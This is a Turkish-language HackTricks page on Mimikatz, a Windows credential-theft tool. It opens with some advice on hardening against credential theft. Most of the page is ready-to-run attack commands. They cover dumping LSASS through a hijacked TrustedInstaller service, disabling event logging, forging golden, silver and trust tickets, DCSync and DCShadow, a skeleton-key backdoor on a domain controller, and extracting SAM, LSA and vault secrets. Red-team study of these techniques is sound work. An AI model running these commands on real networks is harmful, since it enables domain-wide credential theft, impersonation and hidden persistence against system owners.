11 KiB
Mimikatz
htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahramana kadar AWS hacklemeyi öğrenin!
- Bir cybersecurity şirketinde çalışıyor musunuz? Şirketinizi HackTricks'te reklamını görmek ister misiniz? veya PEASS'ın en son sürümüne veya HackTricks'i PDF olarak indirmek ister misiniz? ABONELİK PLANLARINI kontrol edin!
- The PEASS Family koleksiyonumuz olan özel NFT'leri keşfedin
- Resmi PEASS & HackTricks ürünlerini alın
- 💬 Discord grubuna veya telegram grubuna katılın veya Twitter'da takip edin 🐦@carlospolopm.
- Hacking hilelerinizi hacktricks repo ve hacktricks-cloud repo göndererek paylaşın.
Bu sayfa adsecurity.org'den alınmıştır. Daha fazla bilgi için orijinal sayfaya bakın!
Bellekte LM ve Açık Metin
Windows 8.1 ve Windows Server 2012 R2'den itibaren, kimlik bilgilerinin çalınmasına karşı önemli önlemler alınmıştır:
-
LM hash'leri ve açık metin parolaları, güvenliği artırmak için artık bellekte depolanmamaktadır. "Açık metin" parolalarının LSASS'ta önbelleğe alınmamasını sağlamak için belirli bir kayıt defteri ayarı olan HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential" DWORD değeri
0
olarak yapılandırılmalıdır. -
LSA Koruma, Yerel Güvenlik Otoritesi (LSA) işlemini yetkisiz bellek okuması ve kod enjeksiyonundan korumak için tanıtılmıştır. Bu, LSASS'ı korunan bir işlem olarak işaretleyerek gerçekleştirilir. LSA Koruma'nın etkinleştirilmesi şunları içerir:
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa kayıt defterinin
RunAsPPL
değerinidword:00000001
olarak ayarlamak. - Bu kayıt defteri değişikliğini yönetilen cihazlar üzerinde zorunlu kılan bir Grup İlkesi Nesnesi (GPO) uygulamak.
Bu korumalara rağmen, Mimikatz gibi araçlar, belirli sürücüler kullanarak LSA Koruma'yı atlayabilir, ancak bu tür eylemler olay günlüklerinde kaydedilebilir.
SeDebugPrivilege Kaldırmasına Karşı Önlem Alma
Yöneticiler genellikle programları hata ayıklamak için SeDebugPrivilege'a sahiptir. Bu ayrıcalık, yetkisiz bellek dökümlerini önlemek için kısıtlanabilir, saldırganların bellekten kimlik bilgilerini çıkarmak için kullandığı yaygın bir tekniktir. Bununla birlikte, bu ayrıcalık kaldırılsa bile, TrustedInstaller hesabı özel bir hizmet yapılandırması kullanarak hafıza dökümleri yapabilir:
sc config TrustedInstaller binPath= "C:\\Users\\Public\\procdump64.exe -accepteula -ma lsass.exe C:\\Users\\Public\\lsass.dmp"
sc start TrustedInstaller
Bu, lsass.exe
belleğinin bir dosyaya dökülmesine olanak sağlar. Bu dosya daha sonra başka bir sistemde analiz edilerek kimlik bilgileri çıkarılabilir:
# privilege::debug
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonpasswords
Mimikatz Seçenekleri
Mimikatz'ta olay günlüğü manipülasyonu iki temel eylemi içerir: olay günlüklerini temizleme ve olay hizmetini yamalama (yeni olayların kaydedilmesini engellemek için). Aşağıda, bu eylemleri gerçekleştirmek için kullanılan komutlar bulunmaktadır:
Olay Günlüklerini Temizleme
- Komut: Bu eylem, kötü niyetli faaliyetleri izlemeyi zorlaştırmak için olay günlüklerini silmeyi amaçlar.
- Mimikatz, standart belgelerinde olay günlüklerini doğrudan komut satırı aracılığıyla temizlemek için doğrudan bir komut sağlamaz. Bununla birlikte, olay günlüğü manipülasyonu genellikle belirli günlükleri temizlemek için Mimikatz dışında sistem araçları veya komut dosyaları kullanmayı içerir (örneğin, PowerShell veya Windows Olay Görüntüleyici kullanarak).
Deneysel Özellik: Olay Hizmetini Yamalama
-
Komut:
event::drop
-
Bu deneysel komut, Olay Günlüğü Hizmeti'nin davranışını değiştirmek için tasarlanmıştır ve yeni olayların kaydedilmesini etkili bir şekilde engeller.
-
Örnek:
mimikatz "privilege::debug" "event::drop" exit
-
privilege::debug
komutu, Mimikatz'ın sistem hizmetlerini değiştirmek için gerekli ayrıcalıklarla çalışmasını sağlar. -
event::drop
komutu, Olay Günlüğü hizmetini yamar.
Kerberos Bilet Saldırıları
Golden Bilet Oluşturma
Golden Bilet, etki alanı genelinde erişim taklitine izin verir. Ana komut ve parametreler:
- Komut:
kerberos::golden
- Parametreler:
/domain
: Etki alanı adı./sid
: Etki alanının Güvenlik Tanımlayıcısı (SID)./user
: Taklit edilecek kullanıcı adı./krbtgt
: Etki alanının KDC hizmet hesabının NTLM karması./ptt
: Bileti doğrudan belleğe enjekte eder./ticket
: Bileti daha sonra kullanmak üzere kaydeder.
Örnek:
mimikatz "kerberos::golden /user:admin /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:ntlmhash /ptt" exit
Silver Bilet Oluşturma
Silver Biletler, belirli hizmetlere erişim sağlar. Anahtar komut ve parametreler:
- Komut: Altın Bilet'e benzer, ancak belirli hizmetlere yöneliktir.
- Parametreler:
/service
: Hedeflenen hizmet (örneğin, cifs, http).- Diğer parametreler Altın Bilet'e benzer.
Örnek:
mimikatz "kerberos::golden /user:user /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /target:service.example.com /service:cifs /rc4:ntlmhash /ptt" exit
Güven Bileti Oluşturma
Güven Biletleri, güven ilişkilerini kullanarak alanlar arası kaynaklara erişim sağlamak için kullanılır. Ana komut ve parametreler:
- Komut: Güven ilişkileri için Altın Bilet'e benzer.
- Parametreler:
/target
: Hedef alanın FQDN'si./rc4
: Güven hesabının NTLM özeti.
Örnek:
mimikatz "kerberos::golden /domain:child.example.com /sid:S-1-5-21-123456789-123456789-123456789 /sids:S-1-5-21-987654321-987654321-987654321-519 /rc4:ntlmhash /user:admin /service:krbtgt /target:parent.example.com /ptt" exit
Ek Kerberos Komutları
-
Biletleri Listeleme:
-
Komut:
kerberos::list
-
Geçerli kullanıcı oturumu için tüm Kerberos biletlerini listeler.
-
Önbelleği Geçme:
-
Komut:
kerberos::ptc
-
Önbellek dosyalarından Kerberos biletlerini enjekte eder.
-
Örnek:
mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit
-
Bileti Geçme:
-
Komut:
kerberos::ptt
-
Başka bir oturumda Kerberos bileti kullanmayı sağlar.
-
Örnek:
mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit
-
Biletleri Temizleme:
-
Komut:
kerberos::purge
-
Oturumdaki tüm Kerberos biletlerini temizler.
-
Çakışmaları önlemek için bilet manipülasyon komutları kullanmadan önce kullanışlıdır.
Active Directory Manipülasyonu
-
DCShadow: Geçici olarak bir makineyi AD nesne manipülasyonu için bir DC gibi çalıştırır.
-
mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit
-
DCSync: Şifre verilerini istemek için bir DC'yi taklit eder.
-
mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit
Kimlik Bilgilerine Erişim
-
LSADUMP::LSA: LSA'dan kimlik bilgilerini çıkarır.
-
mimikatz "lsadump::lsa /inject" exit
-
LSADUMP::NetSync: Bir bilgisayar hesabının şifre verilerini kullanarak bir DC'yi taklit eder.
-
NetSync için özel bir komut sağlanmamıştır.
-
LSADUMP::SAM: Yerel SAM veritabanına erişim sağlar.
-
mimikatz "lsadump::sam" exit
-
LSADUMP::Secrets: Kayıt defterinde depolanan şifreleri şifreler.
-
mimikatz "lsadump::secrets" exit
-
LSADUMP::SetNTLM: Bir kullanıcı için yeni bir NTLM karma değeri belirler.
-
mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit
-
LSADUMP::Trust: Güven ilişkisi kimlik doğrulama bilgilerini alır.
-
mimikatz "lsadump::trust" exit
Çeşitli
- MISC::Skeleton: Bir DC'deki LSASS'a bir arka kapı enjekte eder.
mimikatz "privilege::debug" "misc::skeleton" exit
Yetki Yükseltme
-
PRIVILEGE::Backup: Yedekleme haklarını elde eder.
-
mimikatz "privilege::backup" exit
-
PRIVILEGE::Debug: Hata ayıklama ayrıcalıklarını elde eder.
-
mimikatz "privilege::debug" exit
Kimlik Bilgilerini Sızdırma
-
SEKURLSA::LogonPasswords: Oturum açmış kullanıcıların kimlik bilgilerini gösterir.
-
mimikatz "sekurlsa::logonpasswords" exit
-
SEKURLSA::Tickets: Bellekten Kerberos biletlerini çıkarır.
-
mimikatz "sekurlsa::tickets /export" exit
Sid ve Token Manipülasyonu
-
SID::add/modify: SID ve SIDHistory'yi değiştirir.
-
Ekle:
mimikatz "sid::add /user:targetUser /sid:newSid" exit
-
Değiştir: Değiştirme için özel bir komut sağlanmamıştır.
-
TOKEN::Elevate: Tokenları taklit eder.
-
mimikatz "token::elevate /domainadmin" exit
Terminal Hizmetleri
-
TS::MultiRDP: Birden fazla RDP oturumuna izin verir.
-
mimikatz "ts::multirdp" exit
-
TS::Sessions: TS/RDP oturumlarını listeler.
-
TS::Sessions için özel bir komut sağlanmamıştır.
Vault
- Windows Vault'tan şifreleri çıkarır.
mimikatz "vault::cred /patch" exit
htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahraman olmaya kadar AWS hackleme öğrenin
- Bir cybersecurity şirketinde çalışıyor musunuz? Şirketinizi HackTricks'te reklamını görmek ister misiniz? veya PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz? ABONELİK PLANLARINI kontrol edin!
- The PEASS Ailesi'ni, özel NFT'lerimiz koleksiyonunu keşfedin.
- Resmi PEASS & HackTricks ürünlerine göz atın.
- 💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦@carlospolopm'u takip edin.
- Hacking hilelerinizi hacktricks repo ve hacktricks-cloud repo ile PR göndererek paylaşın.